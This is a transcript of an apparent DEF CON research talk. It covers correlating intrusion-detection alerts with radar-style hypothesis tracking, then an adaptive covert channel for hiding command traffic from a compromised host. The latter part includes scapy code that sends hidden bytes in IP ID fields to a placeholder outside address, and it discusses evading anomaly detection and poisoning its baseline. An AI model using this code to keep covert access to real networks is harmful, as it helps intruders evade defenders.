Specifically, I work in the Information Systems Technology program, which takes a very applied approach to engineering, and specifically to information technology systems. At the University of Central Florida we're currently developing an undergraduate security program, and I'm the one mainly involved in developing it; that's actually what my second talk, a little later today, is about. This is the more technical, and maybe more interesting, of the two. My past research includes the correlation of distributed network sensors: if you have a large-scale network, you have intrusion detection systems, firewalls, and other things recording information about what's going on, and you try to correlate that information together to see the big picture, rather than the little half-views of what's really occurring that each sensor gives you. I'm also working on some projects involving combined data-sharing networks for law enforcement in the state of Florida.

A little blurb about the University of Central Florida: we've got about 42,000 students, about 5,500 of whom are in engineering, and we're located about 13 miles east of Orlando, Florida. As I said, the Information Systems Technology program is really an applied engineering degree: very hands-on, very real-world, very current tools, with a heavy concentration of hands-on learning rather than the traditional theoretical approach to engineering.

A little background on what led to the current idea. In previous research, which I presented at DEF CON 9 and 10, I used Bayesian multiple hypothesis tracking to analyze reports from distributed intrusion detection systems and other types of network sensors. The idea was to determine whether the events you were seeing were correlated, whether one was an initial attack and another a follow-up, or whether two events seen in two different places might be two systems communicating that shouldn't be communicating together, and to do this with multiple sensors spread over large distributed networks. The basic approach was to take target tracking methods that came out of radar systems, which track real objects in the sky with various radars, and treat all the sensors on our network, whether an IDS, a firewall, a router, or even a human sitting there making observations, the same way, automating the correlation of their reports. This wasn't intended to throw the human analyst out of the loop entirely, but to act as a first-level filter that discards the information you don't need in order to come to a conclusion about what's going on. The idea was to move toward a complete view instead of the one section of the network that's visible to any one sensor. Say you've got your firewall sitting at the border of your network.
It sees everything coming in and out at the border, but it doesn't see traffic that's entirely internal to the network. You might have an intrusion detection system sitting on one segment that sees what's going on there, but not what's happening on another segment. The idea was to take all these little pieces of information and put them together into a more complete view of what someone was doing while attacking the network. We did this using radar tracking algorithms, specifically Bayesian multiple hypothesis tracking, by drawing an analogy to the world of computer security. Our firewalls, our IDSs, our humans watching the network, anything that records information, is a sensor, like a radar system. The actions of the person out there trying to break into the network are the target, and the events they generate are the trace they leave behind. We're trying to piece those traces together, and we're working in a situation where we have to do it in real time, with incomplete data, and with potentially inaccurate data, depending on how the sensors are operating.

A little more about how this multiple hypothesis tracking works. An event is when a sensor recognizes that something is occurring: when something pops up on the sensor and it gives a report, when an IDS says, hey, I think I see something, when a firewall decides it's not going to allow a packet or sees something unusual, when the sysadmin on your network says, hey, something weird is going on here. As these events arrive, they're analyzed. Say one of our systems sees a port scan happening out there. We build a hypothesis about what we think is going on. If a single scan is coming in from the outside world, that's all the information we have, so that's the only hypothesis we can come to: we're seeing a port scan right now. Technically, you can make two hypotheses at this point: there's a port scan going on, or, alternatively, my IDS isn't working properly and this is a false positive. Then as other events occur, say you see a buffer overflow attack against a machine following the scan, what could be going on now? We could assume the port scan is being followed up by the buffer overflow: someone scanned a machine for a vulnerability, then attacked that particular vulnerability. Or these could be two unrelated events: the port scan part of one attack, the buffer overflow part of a different attack on the system. What we were trying to do was automate the process of figuring this out. Now, this is a simple example, a pretty trivial case. If the port scan is against, say, port 80, and the buffer overflow is against an IIS server, chances are those two things are related. If the port scan doesn't match up with the buffer overflow, chances are they're not.
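To make the bookkeeping concrete, here's a minimal sketch of that branching step in Python. Everything in it is illustrative, assuming a toy scoring model: the class, the prior weights, and the affinity function are stand-ins invented for this example, not the actual system's code.

```python
# A minimal sketch of multiple-hypothesis branching over sensor events.
# The weights 0.3 and 0.1 are illustrative priors, not the real system's.
from dataclasses import dataclass, field

@dataclass
class Hypothesis:
    tracks: list = field(default_factory=list)         # chains of related events
    false_positives: list = field(default_factory=list)
    score: float = 1.0

def expand(hypotheses, event, affinity):
    """Branch every hypothesis on each way the new event could be explained:
    it extends an existing attack chain, starts a new unrelated one,
    or is a false positive from an imperfect sensor."""
    children = []
    for h in hypotheses:
        for i, track in enumerate(h.tracks):           # event continues chain i
            tracks = [list(t) for t in h.tracks]
            tracks[i].append(event)
            children.append(Hypothesis(tracks, list(h.false_positives),
                                       h.score * affinity(track[-1], event)))
        children.append(Hypothesis([list(t) for t in h.tracks] + [[event]],
                                   list(h.false_positives),
                                   h.score * 0.3))      # new, unrelated attack
        children.append(Hypothesis([list(t) for t in h.tracks],
                                   h.false_positives + [event],
                                   h.score * 0.1))      # sensor false positive
    return children

# The port scan / buffer overflow example: matching ports score high.
def affinity(prev, cur):
    return 0.9 if prev["port"] == cur["port"] else 0.05

hyps = [Hypothesis()]
hyps = expand(hyps, {"type": "portscan", "port": 80}, affinity)
hyps = expand(hyps, {"type": "overflow", "port": 80}, affinity)
best = max(hyps, key=lambda h: h.score)                # the related-chain hypothesis
```

Run on the example above, the hypothesis chaining the scan and the overflow together comes out on top when the ports line up, and the unrelated-events hypothesis wins when they don't.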
But you can extrapolate from this idea to much more complicated systems and much more complicated series of events, trying to piece together whether all of these things we see occurring across the network are related to each other or not, whether they're likely to be something real, or a false positive caused by an imperfect sensor, an imperfect IDS or firewall or human in the loop. Actually, when I was working on this, one of the most interesting sources of data came from the Capture the Flag games here at DEF CON. Luckily, the Shmoo Group captures the network traffic from the Capture the Flag game, and that provided a great playground for testing whether the information could be correlated together.

This graph I've got up here is pulled right out of context; these are slides I grabbed just to give a bit of background on the previous research. Basically, it shows what happens as you let the number of hypotheses under consideration increase. In the previous example we had two hypotheses: either the two events are unrelated, or they're part of a chain making up a single attack. We take those as our hypotheses, look at the evidence, and evaluate which hypothesis we currently believe is the best one available, with some confidence level attached. Then we wait for more information to come in, build more hypotheses, and re-evaluate the likelihood of the existing ones. At least in theory, this eventually converges to a point where one hypothesis is clearly the winner. The problem, and this is why I said in theory, is that you'd have to consider every possible hypothesis for that to hold, and the number of hypotheses grows at a super-exponential rate, so it's practically impossible. There's a lot of work on pruning, on deciding which hypotheses to keep and which to throw away. What this graph shows, along the bottom, is the number of hypotheses allowed to remain in the system, from one all the way up to 1,000, against the accuracy with which the system correlated the different attacks together. It never quite reached 100%, but it got up to about 93-94% accuracy on the Capture the Flag data at piecing together which attacks were related. Of course, the baseline it was scored against was built by hand: I, and a few others who helped me, took about eight hours' worth of Capture the Flag data, worked out by hand which attacks were related, and then built the system to automate that process.
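Since enumerating every hypothesis is intractable, pruning is what makes the approach practical. A minimal sketch, reusing the illustrative Hypothesis class above, where max_kept corresponds to the knob on the graph's x-axis:

```python
import heapq

def prune(hypotheses, max_kept=1000):
    """Keep only the max_kept best-scoring hypotheses and renormalize,
    so the scores remain usable as relative confidences."""
    survivors = heapq.nlargest(max_kept, hypotheses, key=lambda h: h.score)
    total = sum(h.score for h in survivors) or 1.0
    for h in survivors:
        h.score /= total
    return survivors

# After each event arrives: hyps = prune(expand(hyps, event, affinity))
```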
So this thing worked; it was a pretty decent idea, though it didn't necessarily work as well as we had hoped initially. If everything is on the same network, or related networks, where you're likely to see lots of related events, it works well. If it's distributed over large networks, where you're likely to see many more unrelated events than related ones, the accuracy goes down a bit, or, more accurately, the amount of work you have to do to get good accuracy goes way up.

So that's what I'd done in the past: a system developed to detect related information on a network. And of course, once you can do that, you think about the next step, and once you can detect something, you figure out how to hide it even better, right? It's always that game of one-upmanship we're playing. So it got me thinking: how do you defeat a system that works like that? How could you avoid detection on a network that was well observed, well monitored, and where the information was well correlated, where you couldn't rely on the guy sitting on this part of the network not knowing what the guy sitting on that other part was seeing or knew about? If you assume complete coverage of the network, how could you hide what was going on?

I'm not talking so much about detecting a specific initial attack, someone doing a buffer overflow against a web server or whatever other initial attack to gain access to the system. Assume they're already on there: they've gotten onto the system, they've got the remote machine they're sitting at, they've got access to a machine on the network, and they want to keep communicating back and forth without being detected while doing it. How could you go about that on a well-monitored network?

You have to look at this from the point of view of where you have choices about what you do. With the initial attack, you don't have a lot of choices. Unless you get lucky and find a system with a ton of vulnerabilities, there are limited ways into a system to begin with, so any tool written to initially gain access usually has a fairly limited lifespan. At least, it has a limited lifespan in the realm of people who actually care about security; you'll always find some bozo out there who never updates anything and never puts any security on their systems, and you can always get into those. But against the people who are serious about it, any tool for initially getting in has a limited lifespan. However, once you have access to a machine and all you're worried about is communicating with it, you've got a lot of choices. We're not stuck with one type of communication protocol; we're not stuck with any traditional communication protocol whatsoever. The trick is figuring out which ones will work and which ones won't be seen.

So here's the question: how do you communicate on a network without letting anyone know you're doing it? First things first, how do they detect what's going on? How does someone see what you're doing on a network? You've got IDSs, you've got firewalls, you've got observers, all sitting there watching what's going on on the network.
In general, I say the IDS, software or human, because whatever's looking at your network, whether it's automated or a person, is trying to determine whether someone's intruding. The IDS is, in at least one sense, the most general case, and you can find derivative cases covering the same concept for firewalls, routers, and everything else out there. There are basically two forms of detection: anomaly detection and signature detection. Signature detection works on known attacks, known events. If you know exactly what you're looking for, you know that when you see this packet go by it's something bad and you want to throw up an alert; great, you can catch it every time, it'll never get by, you've got that one nailed. The only way to avoid that type of detection is to use an unknown method, or perhaps something that changes constantly and never uses the same method twice. Anomaly detection doesn't detect misuse of the system, doesn't detect something malicious; it just detects something unusual. So it's not necessarily great at picking up something bad happening on your network, but it will pick up something unusual. And if signature detection doesn't work, that's the only chance you have left: if you don't know what to look for, you have to look for things that stand out.

So we can't really avoid signature detection: if you've got a way of communicating, or of doing anything on the network, and someone can write a signature to detect it, that's it. It has a limited lifespan; eventually it's going to be seen. The only alternative is to use something you can't write a signature for: something that changes constantly, something that is quote-unquote random, or at least appears random to anything observing the network. And we have to do this without looking unusual. That's the key, and it's a catch-22 in a way: we have to do something very unusual, this randomly changing communication protocol, but we have to do it without looking unusual. We can't stand out.

So the first stage is to detect the baseline of the network. What does the traffic look like to begin with? What is occurring on the network, all the time? This can be done passively: you can sit back and discover what type of traffic is allowed on the network and what normal traffic looks like, and build yourself a map of what is going on, what the structure of the network is, and what's allowed in and out. This is not a new concept; the general idea is used all the time, and it's how many tools and other fun little things are written and developed. But the key thing is that, generally, this is a process people do by hand: someone looks at a network and thinks about what's going on there.
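As a rough sketch of what automating that passive discovery stage might look like, here's a minimal example in Python, assuming the scapy library; the particular counters kept and the ten-minute listening window are arbitrary choices for illustration.

```python
# A minimal sketch of passive baseline discovery with scapy: tally who
# talks to whom over which (protocol, port) channel, sending nothing.
from collections import Counter
from scapy.all import sniff, IP, TCP, UDP

baseline = Counter()   # (proto, dst_port) -> packets observed
talkers = Counter()    # (src, dst) -> packets observed

def observe(pkt):
    if not pkt.haslayer(IP):
        return
    talkers[(pkt[IP].src, pkt[IP].dst)] += 1
    if pkt.haslayer(TCP):
        baseline[("tcp", pkt[TCP].dport)] += 1
    elif pkt.haslayer(UDP):
        baseline[("udp", pkt[UDP].dport)] += 1

# Listen quietly for ten minutes, then look at what "normal" is here.
sniff(prn=observe, store=False, timeout=600)
print(baseline.most_common(10))
```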
A good example of this hand-built approach is the reverse WWW shell, an old tool. The idea is that you've got a computer inside the network, and you're not allowed to make connections to it from the outside; the firewall is going to drop any inbound connection. So you put a piece of software on that computer inside the network, and at certain intervals, perhaps random intervals, it makes what looks like an outgoing web request from a browser. Except that web request is actually coming to your computer on the outside and picking up the next command you've told it to run; the command is carried back as the HTTP response to the target computer, the one you've got access to, which then carries out that particular command. It masquerades as the computer on the inside just surfing the web. That's a great way of hiding, unless someone knows to look for it; once they do, if you stick with it too long, they're going to look for it, they're going to see it, and it's going to stand out. Carrying data and commands in ICMP echo and echo-response packets is the same sort of idea. What I'm trying to do with this project is automate this process, make it run on the fly, and have it adapt itself to whatever network it's currently working on: look at what's going on on the network, decide what to do there, decide what will work, and then carry it out.

Some aspects of network traffic are going to have low entropy, meaning very little randomness: the same thing always happens. Certain communication protocols only go to certain computers. DNS requests only go to your DNS servers; they're not jumping around to every computer on your network. Incoming web requests probably only come to your web server, not to every computer on your network. Other things look much more random, maybe outgoing web requests, different people surfing the web, outgoing FTP, all sorts of things; there's a lot more entropy there. And entropy is the key to hiding information: the more entropy you have, the more information you can hide. Look at steganography, for example, where you're trying to hide information inside something else. A bitmap has lots and lots of redundant information in it, versus a JPEG, which has taken a lot of that redundant information out; that's why a JPEG is smaller than a bitmap. You can hide a lot more information in a bitmap than you can in a JPEG. Where there's more room for variation, you can hide more information. So if we find what has the highest entropy on the network, which communication channels have the highest degree of randomness, we can pick where we want to work. And we've got all sorts of things to work with: the timing of packets, packets with bad or malformed checksums, all sorts of different things to play with. We don't have to use SSH or Telnet or some other standard communication format; we can send crafted packets where the information is carried in all sorts of different little pieces of the packet. The key is just making sure it doesn't look unusual when that packet goes out.

So the overall concept is: detect the network's baseline condition, what normal looks like on the specific network we're looking at, what doesn't look unusual, and then select the potential communication channels from that, determining which ones carry highly random information on the network.
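As one concrete illustration of carrying data in those little pieces of a packet, here's a minimal sketch, again assuming scapy, that hides two bytes per packet in the IP identification field of ordinary-looking TCP SYNs. The destination address and the pacing are placeholders; the real system would pick the carrier field, destination, and timing from the observed baseline rather than hardcoding them.

```python
# Minimal sketch: smuggle two bytes per packet in the 16-bit IP ID field
# of what looks like routine TCP traffic toward a web server.
import random, time
from scapy.all import IP, TCP, send

def send_covert(data: bytes, dst="203.0.113.10"):    # placeholder address
    if len(data) % 2:
        data += b"\x00"                   # pad so each packet carries 2 bytes
    for i in range(0, len(data), 2):
        ident = (data[i] << 8) | data[i + 1]
        pkt = IP(dst=dst, id=ident) / TCP(dport=80, flags="S",
                                          sport=random.randint(1024, 65535))
        send(pkt, verbose=False)
        time.sleep(random.uniform(0.5, 3.0))          # irregular, browsing-like pacing

send_covert(b"uname -a")
```

A receiver sniffing in promiscuous mode on the right segment just reassembles the bytes from the ID fields; nothing in the packets themselves is signature-worthy unless the baseline says this host never talks to port 80.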
To pare it down: initially we can select from anything, we can craft a packet that does whatever we want. Then we look at what happens on the network, figure out what's allowed, limit ourselves to that, and then limit ourselves further to what has a lot of entropy within that. We then have to somehow communicate this method to the receiver on the outside; we have to get the information about how we're going to communicate out to them. And then maintain an, I'll say almost, undetectable presence on the network. You should never think you're undetectable; you should never think anything's absolute, because it never is, and that's how you get yourself into trouble. But we can monitor the network conditions and update: if the conditions change, we can change the scheme we're using to communicate.

What can we learn just by sitting there and listening on the network? All sorts of things, without doing anything active, without doing anything that could be discovered. You can figure out what types of packets are allowed into and out of the network. You can figure out the architecture of the network: where are the switches, where are the routers, where are the other machines? Then look at what types of packets are flying around. What types does the machine I'm on send and receive? What types do other machines send and receive? From this we get an idea of what is allowed to move around the network, what is actually moving around it, and what we can inject into the data flowing around without sticking out like a sore thumb and being immediately identified.

So we narrow down the choices. We start with the ability to send any type of packet to any port whatsoever, and pare it down based on what's available, figuring out what has the highest entropy. We look at the types of packets by protocol, the ports they're using, and so on, and look at the entropy: how often do these packets fly by, how different is the data in them each time, which machines do these types of packets go to? Then we pick a channel that we know can get from point A to point B: from inside the network where we've got access to the machine, out of that network and over to the place we want to get the information to, and back the other way. It doesn't have to be a symmetric communication channel. The packets you send going out one way don't have to look anything like the packets coming back the other way. As long as they get to the right segment of the network, down to the right branch off the switch, so they can be picked up by a network card in promiscuous mode, and each end knows what to look for, you can have what are essentially two different channels going back and forth.
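A minimal sketch of that paring-down step, building on the kind of counters the passive listener above collects; the scoring rule, prefer channels common enough that one more packet won't stand out but with enough natural variation to hide in, is an illustrative stand-in for whatever metric the finished system ends up using.

```python
# Minimal sketch of channel selection: rank observed (proto, port)
# channels by the Shannon entropy of which hosts they go to.
import math
from collections import Counter, defaultdict

# channel -> Counter of destination hosts seen using it; in practice
# this would be filled in by the passive observe() loop sketched above.
channel_dsts = defaultdict(Counter)

def shannon_entropy(counts):
    total = sum(counts.values())
    return -sum((n / total) * math.log2(n / total)
                for n in counts.values() if n)

def rank_channels(channel_dsts, min_packets=50):
    scored = []
    for chan, dsts in channel_dsts.items():
        if sum(dsts.values()) < min_packets:
            continue                      # too rare: any use is an anomaly
        scored.append((shannon_entropy(dsts), chan))
    return sorted(scored, reverse=True)   # best hiding places first
```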
One of the big challenges with this system is starting the conversation. If you've got a piece of software running inside the network that's going to start communicating with you on the outside, and you don't know which particular communication scheme it's going to use, there's some difficulty in getting that first packet, that first piece of information, to the outside without it being something a signature can easily be written for. It's hard to change things or inject randomness into the first bit of communication. There are ways to limit how signature-vulnerable that first exchange is, but that's one of the points that presents some challenge and needs more work.

Having the communication software itself remain undetected on the remote machine, not what the software is doing but the software itself avoiding detection, is of course another challenge, but that's a completely different story: whether it's something using polymorphic code that changes from one installation to another, or even changes itself constantly. There are ways around that, but it is another challenge.

The third one, which I think is actually fairly interesting, is the problem of a low-entropy network. What do you do when there's not a lot of randomness going on on the network? If there's not a lot of randomness in the packets, how do we stay hidden in them? We have to ensure that every packet we send doesn't significantly affect the statistical baseline of the network, so that an anomaly detection system sitting on the network won't recognize it as something unusual: it won't stand out, it won't push the statistical analysis of the network beyond the current thresholds, and it will avoid becoming an anomaly. This is the area I'm concentrating on right now: figuring out the best methods for communicating, and for picking well-hidden channels, on a low-entropy network.

So, as a summary of the system, what's real and what's not: the allowed-protocols discovery, the network architecture discovery, and the statistical profiling of the network are working prototypes; those modules, those parts of the system, are working. The next stages we're moving toward are the selection of the communication scheme, the implementation of the communication, and the adaptation to changing network conditions. I hope that by this time next year this will be a working package and I can give a better presentation and demonstration of what it's actually doing, but this is the current idea. Anybody who has any interest in this, or any ideas or feedback, or wants to tell me why I'm crazy for thinking it, feel free; there's my contact information. And that's it for about a 25-minute presentation. There's one question.

That is a great question; I'll try to answer one more real quick. He asks whether there's any concept of trying to actually change the baseline of the network, so that something that used to look unusual doesn't look unusual anymore. That's not one of the first-level items; it's a pretty advanced way of working it. But injecting traffic slowly enough that the anomaly detection system adapts to it and comes to think it's normal is one of the long-term ideas. That's a great idea to put into this. Thank you.